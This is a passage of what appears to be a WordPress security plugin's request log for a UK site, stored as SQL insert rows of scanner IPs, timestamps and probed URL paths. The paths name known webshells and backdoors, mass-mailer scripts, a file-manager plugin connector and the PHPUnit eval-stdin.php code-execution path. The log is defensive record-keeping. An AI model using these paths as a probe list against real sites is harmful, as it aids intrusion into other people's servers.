lyjolly.co.uk/wp-content/plugins/wpconfig.bak.php',0,13,0),('91.191.209.106',1539297642,'',0,1673863459.5679,55,'01haD9yoqnGcQYUti5A4Lkpv','','19|0|0|0|www.dailyjolly.co.uk/archives.php',0,19,0),('91.191.209.106',1539297642,'',0,1673863533.2825,55,'ck8PobRaESfgWiAZD5sGrFLU','','19|0|0|0|www.dailyjolly.co.uk/defau11.php',0,19,0),('20.165.29.249',346365433,'',0,1673883174.0424,55,'zpWnP2xH8SXbiCZhGr0mQqUe','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('20.165.29.249',346365433,'',0,1673883178.1073,55,'l1T2PF4gG7Zp5ozRDqv0yBfw','','19|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('20.165.29.249',346365433,'',0,1673883179.2608,55,'07Ktw5FAE38f1zLTOUprBneV','','19|0|0|0|www.dailyjolly.co.uk/beence.php',0,19,0),('20.165.29.249',346365433,'',0,1673883184.0575,55,'xLpsQwkn763KvdfhZDbcGgtJ','','19|0|0|0|www.dailyjolly.co.uk/export.php',0,19,0),('20.165.29.249',346365433,'',0,1673883184.5606,55,'MOG6j8vrV4Kwe9yAucoN3h7Q','','19|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,19,0),('20.165.29.249',346365433,'',0,1673883184.5790,10,'MOG6j8vrV4Kwe9yAucoN3h7Q','','707|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,707,0),('20.165.29.249',346365433,'',0,1673883186.9070,55,'rXoTYmvBafKtUydEL1H24pPQ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-atom.php',0,19,0),('20.165.29.249',346365433,'',0,1673883188.0163,55,'4MB6wnxHqu2S3TjmYOcNQIda','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/css.php',0,19,0),('20.165.29.249',346365433,'',0,1673883188.5544,55,'JfjkXnaALbwIBqWyc6uUshGx','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('20.165.29.249',346365433,'',0,1673883189.6539,55,'eTNQybUDCdzHi7aLM02sGZhV','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('20.165.29.249',346365433,'',0,1673883191.0215,55,'Vwaby7UGLESe5vhp90F48oOP','','19|0|0|0|www.dailyjolly.co.uk/moduless.php',0,19,0),('20.165.29.249',346365433,'',0,1673883200.2807,100,'ZUxKBe8dW2JnOMzqDYmwN0V6','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php',0,13,0),('20.165.29.249',346365433,'',0,1673883205.0336,55,'rfG92oODBWVw17TjEI8N5ixd','','19|0|0|0|www.dailyjolly.co.uk/archives.php',0,19,0),('20.165.29.249',346365433,'',0,1673883206.5192,55,'x6p3NUi7QeRytVFc2I8MZaDo','','19|0|0|0|www.dailyjolly.co.uk/defau11.php',0,19,0),('91.238.82.36',1542345252,'',0,1673883547.0626,55,'O8oIrc1EbHQM67PepDs3XYqW','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('91.238.82.36',1542345252,'',0,1673883639.2222,55,'3rzf27XWyUuIgOtdvxYlJaie','','19|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('91.238.82.36',1542345252,'',0,1673883641.2398,55,'W9CRQd3P4VHm5l0yNf6T2wGL','','19|0|0|0|www.dailyjolly.co.uk/beence.php',0,19,0),('91.238.82.36',1542345252,'',0,1673883646.9983,55,'Waxf8SdmIMJptFRr9HDl7UQ6','','19|0|0|0|www.dailyjolly.co.uk/export.php',0,19,0),('91.238.82.36',1542345252,'',0,1673883647.4872,55,'3GcRwYx7PyQTVagJjI4KEeBr','','19|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,19,0),('91.238.82.36',1542345252,'',0,1673883647.5347,10,'3GcRwYx7PyQTVagJjI4KEeBr','','707|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,707,0),('91.238.82.115',1542345331,'',0,1673883694.1831,55,'LnBI49d7PogOjZyEYeVh0cNx','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-atom.php',0,19,0),('91.238.82.115',1542345331,'',0,1673883702.7207,55,'4hOXMpbN6yPcAY7e5K20Wjum','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/css.php',0,19,0),('91.238.82.115',1542345331,'',0,1673883703.1739,55,'1NZVEIw3QOAKgps5hubjTPc7','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('91.238.82.115',1542345331,'',0,1673883705.0749,55,'6OZPFH79XloU1RYhDwK0ucmA','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('91.238.82.115',1542345331,'',0,1673883708.4030,55,'Bk3MKtxUdXGqWw872u5gz1ZJ','','19|0|0|0|www.dailyjolly.co.uk/moduless.php',0,19,0),('91.238.82.115',1542345331,'',0,1673883708.4275,10,'Bk3MKtxUdXGqWw872u5gz1ZJ','','707|0|0|0|www.dailyjolly.co.uk/moduless.php',0,707,0),('91.238.82.115',1542345331,'',0,1673883750.6930,100,'dlbI6VK2GRxtzcuwFHOJMXYi','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php',0,13,0),('91.238.82.115',1542345331,'',0,1673883852.4838,55,'Vef13aYrJFdSEpXZiB9ytNhn','','19|0|0|0|www.dailyjolly.co.uk/archives.php',0,19,0),('91.238.82.115',1542345331,'',0,1673883855.8076,55,'rRMg8Hnkz5aFxQwYl7VWUP2Z','','19|0|0|0|www.dailyjolly.co.uk/defau11.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884667.4703,55,'hcZSHk8OzLRMm9bxIFf5U2JY','','19|0|0|0|dailyjolly.co.uk/1index.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884671.3682,55,'QKluIYfdA95CV1jXbqgNBzZr','','19|0|0|0|dailyjolly.co.uk/2index.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884683.1803,55,'m0C3UxpcLjzWTPa5dA9vJsFO','','19|0|0|0|dailyjolly.co.uk/3index.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884684.3436,55,'B4kq9hsvdomwO8KbpL1F62el','','19|0|0|0|dailyjolly.co.uk/wp-admin.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884685.3262,55,'CRLMEYiPWkKw0c9zQ2doZSe3','','19|0|0|0|dailyjolly.co.uk/content.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884685.3589,10,'CRLMEYiPWkKw0c9zQ2doZSe3','','707|0|0|0|dailyjolly.co.uk/content.php',0,707,0),('172.174.97.185',2897109433,'',0,1673884686.3489,55,'QkmHpxMwNSqRolTdLIXUGEK4','','19|0|0|0|dailyjolly.co.uk/old-index.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884687.2051,55,'BEHpvm4r0WwX97ageJNYFLZD','','19|0|0|0|dailyjolly.co.uk/new-index.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884688.0723,55,'Pb6glUoF1h8wWHBasxND7pC0','','19|0|0|0|dailyjolly.co.uk/admin.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884689.3000,55,'pgSQOUdK0fk4JXwjaIGs7ohn','','19|0|0|0|dailyjolly.co.uk/wp-includes/css/xm.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884690.1753,55,'ay1UXZSe6vVwmCdG7O5tzrDf','','19|0|0|0|dailyjolly.co.uk/wikindex.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884691.5187,55,'cVnMtf5vuPKJxGhNjWDeQ93y','','19|0|0|0|dailyjolly.co.uk/ups.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884692.3516,55,'asB9LEOU4PgWD6RXfJYne1zN','','19|0|0|0|dailyjolly.co.uk/media-admin.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884693.1861,55,'UKyvPeN9d6BLGqXJCnc0DEpi','','19|0|0|0|dailyjolly.co.uk/mt/pekok.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884694.0018,55,'VaKXN38Ppb10ei6JRjTGUftY','','19|0|0|0|dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884694.8606,55,'mcP6tTUqXJl7FCAhE05Nwgrp','','19|0|0|0|dailyjolly.co.uk/fw.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884695.5857,55,'QmkAnyDO5TdetVzb6KFhPxuC','','19|0|0|0|dailyjolly.co.uk/.cgi/cache/index.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884696.9921,55,'d8atbVYCLp1sNTEqiZzcPryj','','19|0|0|0|dailyjolly.co.uk/fox.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884697.7526,55,'7koJyGi5RprfCTtxVvIW4EDM','','19|0|0|0|dailyjolly.co.uk/fox.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884698.6161,55,'AtNXVlO5TyespLvPI0SZmFcz','','19|0|0|0|dailyjolly.co.uk/xleet.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884699.2608,55,'QvraqtXlMZYFERn42j9SyGkx','','19|0|0|0|dailyjolly.co.uk/radio.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884702.0902,55,'FGUysNVDxp94dAYRfT3EamXc','','19|0|0|0|dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884702.9435,55,'BK8QF9UGHagYwiOClcL7sIbq','','19|0|0|0|dailyjolly.co.uk/wp-includes/css/wp-atom.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884703.8714,55,'mJKgU0BcwYNkbEih15tdVyMS','','19|0|0|0|dailyjolly.co.uk/export.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884716.3201,55,'JmI8nrNQgjthyq6vB5eLDx7T','','19|0|0|0|dailyjolly.co.uk/wp-includes/images/wp-blog.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884717.5286,55,'YD8eRSwfdut0IM1JNgHsik5m','','19|0|0|0|dailyjolly.co.uk/wp-includes/css/wp.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884718.5073,55,'FzBEjHmrPneDpJabG2o6huQA','','19|0|0|0|dailyjolly.co.uk/mini.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884719.3305,55,'M9gOX06v12tmwG5KsTWcYlyL','','19|0|0|0|dailyjolly.co.uk/wso.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884720.1972,55,'4Y2iLVKvU5GosaJgTwMqx9X1','','19|0|0|0|dailyjolly.co.uk/alwso.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884721.1232,55,'mxSWEYdjAJ9LkKCIotZbT8zn','','19|0|0|0|dailyjolly.co.uk/shx.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884727.1247,55,'j1HvSMPT7nB0mpDuYtExWL6F','','19|0|0|0|dailyjolly.co.uk/wp-admin/includes/class-wp-media-list-data.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884735.1050,55,'n8XGhBdkJLPZEce0iIgNYV39','','19|0|0|0|dailyjolly.co.uk/shell20220621.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884735.8386,55,'iKreYckEygl2V7AQ6aupLFB1','','19|0|0|0|dailyjolly.co.uk/lufix.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884742.3470,55,'ZaqRdSQAC4IXL5OkpjfYg6no','','19|0|0|0|dailyjolly.co.uk/xleet-shell.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884743.1260,55,'hCwl85vQs7R3To4ExaJN1kKg','','19|0|0|0|dailyjolly.co.uk/1.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884743.8719,55,'npZgaoQsuxAtW0fU89EwcB2k','','19|0|0|0|dailyjolly.co.uk/alfa.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884745.0735,55,'eGF4b7Qm29lDi1dq0gZXN6OM','','19|0|0|0|dailyjolly.co.uk/wp-content/radio.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884746.0184,55,'JdhFK2XbypHxrRz0wU5lBSCg','','19|0|0|0|dailyjolly.co.uk/wp-admin/radio.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884747.3058,55,'ERl6IMog37knC4DzSApTsxyf','','19|0|0|0|dailyjolly.co.uk/autoload_classmap.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884748.2429,55,'lWBe83w9xEVS5ZdfbtROvjCy','','19|0|0|0|dailyjolly.co.uk/a.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884748.9316,55,'Xk6wsY9jn2tSgE35TOyZKvcp','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884749.7075,100,'Adk9WmZ7iNLRnzBVslp2ET3w','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/1975.php',0,13,0),('172.174.97.185',2897109433,'',0,1673884750.5451,55,'jSsZGiUBPVuYOpo3eA9dRMWH','','19|0|0|0|dailyjolly.co.uk/c.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884751.3843,55,'4pGuUxefE1NS9YbJdHAiXWLa','','19|0|0|0|dailyjolly.co.uk/wp-includes/autoload_classmap.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884752.1404,55,'2TvErABioHwjXumsSfIpDbK7','','19|0|0|0|dailyjolly.co.uk/images/vuln.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884754.7116,55,'SBdta8rlz4fD73GOANsgWRYj','','19|0|0|0|dailyjolly.co.uk/tmp/vuln.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884756.6213,55,'z0Spua2kBQGCYlHANVit3wPb','','19|0|0|0|dailyjolly.co.uk/images/vuln2.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884757.8131,55,'YfkrxqIWF5dhCDnJS9uK8T3O','','19|0|0|0|dailyjolly.co.uk/tmp/vuln2.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884758.7857,55,'Pn8dIf57it3NAm4SxZbLgUuq','','19|0|0|0|dailyjolly.co.uk/x.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884760.0852,55,'gpGb7EFT8HkmjPOZ6sJYt1Mw','','19|0|0|0|dailyjolly.co.uk/404.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884771.8931,55,'KDIGNzXB0qTO5ndvFhig1QUM','','19|0|0|0|dailyjolly.co.uk/sym403.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884785.2653,55,'pqzaU6t2Qu4LZ3wnRNgYCs9G','','19|0|0|0|dailyjolly.co.uk/xmlrpcs.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884786.1391,55,'Bn3NhDziGeFbfgMJL5XdVEot','','19|0|0|0|dailyjolly.co.uk/xmlrpcs.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884787.1818,55,'YngZkxmGXOQaP7zlUsuL4CBp','','19|0|0|0|dailyjolly.co.uk/0z.php',0,19,0),('172.174.97.185',2897109433,'',0,1673884787.9992,100,'a6qDFKwYE1cJAhfQBPbOHVsv','','13|0|0|0|dailyjolly.co.uk/wp-includes/customize/class-wp-customize-nav-menu.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887046.5049,55,'fMkZeSaB8RlAnYbEQ59wsxri','','19|0|0|0|www.dailyjolly.co.uk//plus/erraddsave.php',0,19,0),('107.189.31.198',1807556550,'',0,1673887046.7190,55,'x6EsTSYw5zMrLaWmRyBbZ3A7','','19|0|0|0|www.dailyjolly.co.uk//plus/ad_js.php',0,19,0),('107.189.31.198',1807556550,'',0,1673887046.9400,55,'nu0jiKmQaLh1IXs9pUYZNAqB','','19|0|0|0|www.dailyjolly.co.uk//plus/ad_js.php',0,19,0),('107.189.31.198',1807556550,'',0,1673887047.1571,55,'ISJPsO3Z7Wel6CBNrwbR4Mcg','','19|0|0|0|www.dailyjolly.co.uk//plus/download.php',0,19,0),('107.189.31.198',1807556550,'',0,1673887047.3525,55,'TRvf6p75i3XrklUxC82yG9bm','','19|0|0|0|www.dailyjolly.co.uk//plus/mytag_js.php',0,19,0),('107.189.31.198',1807556550,'',0,1673887047.3693,10,'TRvf6p75i3XrklUxC82yG9bm','','707|0|0|0|www.dailyjolly.co.uk//plus/mytag_js.php',0,707,0),('107.189.31.198',1807556550,'',0,1673887047.5914,18,'Imajrx2NbveP6M90SDXE3RJu','','13|0|0|0|www.dailyjolly.co.uk//plus/myjs.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887047.7844,100,'0VoX9zq4BsU7ZjInOieJNKvb','','13|0|0|0|www.dailyjolly.co.uk//plus/erraddsave.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887047.9887,100,'vcCXsRTlM5xQEOp82WFtPjoB','','13|0|0|0|www.dailyjolly.co.uk//plus/mytag_js.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887048.1919,18,'YG8O7va4EqiwLZIX3os5cD6r','','13|0|0|0|www.dailyjolly.co.uk//plus/mytag_js.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887048.3920,100,'Phb0a58fT7BqEKLjXW1MJvUz','','13|0|0|0|www.dailyjolly.co.uk//plus/download.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887048.5873,100,'7XFpTRGw5mIaAWzxrV2L3Qdy','','13|0|0|0|www.dailyjolly.co.uk//plus/ad_js.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887048.7882,18,'2lxkhBXo6CZ5Ta0Kq3StQHgs','','13|0|0|0|www.dailyjolly.co.uk//plus/laobiao.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887049.0375,100,'OiecLDh6om2YIV9uFU53pQS1','','13|0|0|0|www.dailyjolly.co.uk//plus/download.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887049.2378,100,'80qXI47PM9lzvn2wLtfxV3Zi','','13|0|0|0|www.dailyjolly.co.uk//plus/mytag_js.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887049.4545,18,'UygsNkd6C3PpMjTFxtGiqVum','','13|0|0|0|www.dailyjolly.co.uk//plus/mytag_js.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887049.6420,100,'FUwrNvYOJPc2gsVpGMWD6lyu','','13|0|0|0|www.dailyjolly.co.uk//plus/download.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887049.8395,100,'yqBukMbQJv4HDrKAN8gLcE2m','','13|0|0|0|www.dailyjolly.co.uk//plus/mytag_js.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887050.0248,18,'AvpPEJCrFDtybmOcXzUxqKwG','','13|0|0|0|www.dailyjolly.co.uk//plus/90sec.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887050.2248,100,'0hMWbEn6QdL92jTO5JNHlyYU','','13|0|0|0|www.dailyjolly.co.uk//plus/erraddsave.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887050.4223,100,'5vNoqbIEe3D42cuYwdj0tmUL','','13|0|0|0|www.dailyjolly.co.uk//plus/mytag_js.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887050.6518,18,'g9kzQIVYfMyxu3jHlGqF7r58','','13|0|0|0|www.dailyjolly.co.uk//plus/mytag_js.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887050.8464,100,'AiJt1w9lXpBZcLDNMqVTdUIC','','13|0|0|0|www.dailyjolly.co.uk//plus/digg_ajax.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887051.1859,18,'ThKHWmyLx26JfwvqYXrDA4bG','','13|0|0|0|www.dailyjolly.co.uk//data/cache/t.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887051.3950,100,'EJsOwaAzxIocNtv2nHMRqpg0','','13|0|0|0|www.dailyjolly.co.uk//plus/download.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887051.5969,100,'qhn6oxdHsf7Tj28XNugraAi5','','13|0|0|0|www.dailyjolly.co.uk//',0,13,0),('107.189.31.198',1807556550,'',0,1673887051.8035,100,'i7sFPSyT1JhbmHGURX9LqZo8','','13|0|0|0|www.dailyjolly.co.uk//',0,13,0),('107.189.31.198',1807556550,'',0,1673887051.9974,100,'5FS0uEMkqo9TLaely42rs3XH','','13|0|0|0|www.dailyjolly.co.uk//',0,13,0),('107.189.31.198',1807556550,'',0,1673887052.1982,100,'PF9IpNWOzADhBv1n57gYKXHd','','13|0|0|0|www.dailyjolly.co.uk//',0,13,0),('107.189.31.198',1807556550,'',0,1673887052.5367,100,'MwyJgh73bpES9rRLIxGdU15u','','13|0|0|0|www.dailyjolly.co.uk//user.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887052.7312,18,'MqfvbcL0jCorOZs9xWDB5Rzy','','13|0|0|0|www.dailyjolly.co.uk//utility/convert/index.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887053.0104,18,'J2Fopnak0deW6myvDGAMrgsI','','13|0|0|0|www.dailyjolly.co.uk//index.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887053.2072,18,'QzJldNtY8nw1LTcHF9x5Cm7W','','13|0|0|0|www.dailyjolly.co.uk//index.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887053.4037,100,'SHZJLon2e5NQMCVB0iRyswd7','','13|0|0|0|www.dailyjolly.co.uk//index.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887053.6008,100,'pcTtrVkJUEBL9feWXQiSsDAZ','','13|0|0|0|www.dailyjolly.co.uk//index.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887053.8269,100,'xFP5jGQWobyEVfKZnHNkBeSu','','13|0|0|0|www.dailyjolly.co.uk//index.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887054.0164,18,'J42D89LenTIEgCOHxyuRaUA5','','13|0|0|0|www.dailyjolly.co.uk//index.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887054.2434,18,'Yohyv6Fd1VSJDRuZU9iItc3L','','13|0|0|0|www.dailyjolly.co.uk//index.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887054.5066,100,'6T5i3cGLxQrDBZX2KwVYOm04','','13|0|0|0|www.dailyjolly.co.uk//',0,13,0),('107.189.31.198',1807556550,'',0,1673887054.9306,100,'DbvdQuEjGh5Iicy4wNFr81oW','','13|0|0|0|www.dailyjolly.co.uk//user.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887055.1353,18,'yRMXYLw3bQCIe0VWTBPJdcA2','','13|0|0|0|www.dailyjolly.co.uk//',0,13,0),('107.189.31.198',1807556550,'',0,1673887055.3744,18,'gLuz1sB3MJRQhpdZGXyvejnY','','13|0|0|0|www.dailyjolly.co.uk//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887055.6680,18,'IhJYrv81Bo34at9dmCyG6wDT','','13|0|0|0|www.dailyjolly.co.uk//yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887055.8598,18,'G625oceSVf4U8QmtaRuk1InW','','13|0|0|0|www.dailyjolly.co.uk//laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887056.1636,18,'qVHKLs4uc28PpTearRmBwDSi','','13|0|0|0|www.dailyjolly.co.uk//laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887056.4024,18,'fAKv9GUTOtJnEzWiCQVmDs5k','','13|0|0|0|www.dailyjolly.co.uk//lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,13,0),('107.189.31.198',1807556550,'',0,1673887056.6464,18,'AUe6p9CxLkiYd73EbnqHzKVO','','13|0|0|0|www.dailyjolly.co.uk//zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,13,0),('196.118.14.220',3296071388,'',0,1673890250.3743,55,'SoOr3dHQMNgACpfZx79hyknI','','19|0|0|0|dailyjolly.co.uk/wso.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890250.6351,55,'phYA7IrUeOwcTHkzKZSg142F','','19|0|0|0|dailyjolly.co.uk/xxx.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890250.8796,55,'wPIHCbW14FEKZANoa0tui7Jp','','19|0|0|0|dailyjolly.co.uk/x.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890251.1422,55,'LoDhEreA1TI84PpUysMd6Kwx','','19|0|0|0|dailyjolly.co.uk/new.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890251.3972,55,'vlnBLmOkr14ewXCzYuGqREpT','','19|0|0|0|dailyjolly.co.uk/shell.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890251.4245,10,'vlnBLmOkr14ewXCzYuGqREpT','','707|0|0|0|dailyjolly.co.uk/shell.php',0,707,0),('196.118.14.220',3296071388,'',0,1673890251.6606,55,'rIh9J2C8Sicuoaw1vbQVTznM','','19|0|0|0|dailyjolly.co.uk/alpha.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890251.9066,55,'XuRo5fCgpMDKG9QxJ7Tz4sHk','','19|0|0|0|dailyjolly.co.uk/mailer.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890252.1372,55,'qk2wLH04lXrNOjyc783btfGg','','19|0|0|0|dailyjolly.co.uk/send.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890252.3876,55,'muEa6dpRg0PybjsZFkT1BMz5','','19|0|0|0|dailyjolly.co.uk/leaf.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890252.6281,55,'MGjntkw3J20HqCWE45QxugSh','','19|0|0|0|dailyjolly.co.uk/leafmailer.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890252.8598,55,'ux5OZQ2g63MN8fbTs1daU4Ge','','19|0|0|0|dailyjolly.co.uk/sender.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890253.1048,55,'gRoEDn4Yj5IAysKVbuwrMStP','','19|0|0|0|dailyjolly.co.uk/inbox.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890253.3419,55,'A1i9I2RZ6XhJGQVubawySKrM','','19|0|0|0|dailyjolly.co.uk/up.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890253.5720,55,'dAp5hjEfgbsN4HWUViQKLCvF','','19|0|0|0|dailyjolly.co.uk/ups.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890253.8195,55,'y9IY6ZVkoaSiHjOu1l0QrqJm','','19|0|0|0|dailyjolly.co.uk/media-admin.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890254.0802,55,'Sh3bONEgrjKQDZ2n4qpzvtGa','','19|0|0|0|dailyjolly.co.uk/admin.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890254.3215,55,'t9pumOHVU23TGhgbNx7Irayf','','19|0|0|0|dailyjolly.co.uk/test.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890254.5764,55,'YQSNUhs2dzRin60XfvVJGZu4','','19|0|0|0|dailyjolly.co.uk/srx.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890254.8295,55,'FfLlAgMIZBtOpqQCukDRdsYb','','19|0|0|0|dailyjolly.co.uk/1337.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890255.0801,55,'i5jPJbgOYvq2sA8yKz1xTLhc','','19|0|0|0|dailyjolly.co.uk/doc.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890255.3259,55,'Zi8MYLFm0lqbgrxUVB7jt4pN','','19|0|0|0|dailyjolly.co.uk/xx.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890255.5991,55,'vKoGQOnStciPkheJXWEC5xwu','','19|0|0|0|dailyjolly.co.uk/XxX.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890255.8588,55,'l6oP0zWNpqeEQbkLV459xZFv','','19|0|0|0|dailyjolly.co.uk/leafmailer2.8.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890256.1178,55,'JzvfAbUwghPTRlCWIp7LSsaj','','19|0|0|0|dailyjolly.co.uk/lf.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890256.4298,55,'X3mAFCkl7WDo4BuJNQETLjOr','','19|0|0|0|dailyjolly.co.uk/alex.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890256.6688,55,'P37r0AEleqhY6CHmSnf2Owxg','','19|0|0|0|dailyjolly.co.uk/marijuana.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890256.9082,55,'83ypsovqlQHkhfO9TPWV7jZ2','','19|0|0|0|dailyjolly.co.uk/gaza.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890257.1757,55,'mYf7ZH9gLxdBz3TDjhG2ibae','','19|0|0|0|dailyjolly.co.uk/wp-admin.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890257.5720,55,'TM7qAUpceCW4ElLHY2S9Bj63','','19|0|0|0|dailyjolly.co.uk/1index.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890257.8059,55,'BbQZquwhnOGHeIkExU031XrK','','19|0|0|0|dailyjolly.co.uk/3index.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890258.0498,55,'nZ1GWsPO3YhxrQajDcvgltqy','','19|0|0|0|dailyjolly.co.uk/wikindex.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890258.2915,55,'EH4w0LBiqCDVaOlzgfve8xZT','','19|0|0|0|dailyjolly.co.uk/wso1.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890258.6197,55,'Ai0cdlaWwoDrjUQkNXJ4fL6q','','19|0|0|0|dailyjolly.co.uk/alfa.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890258.8998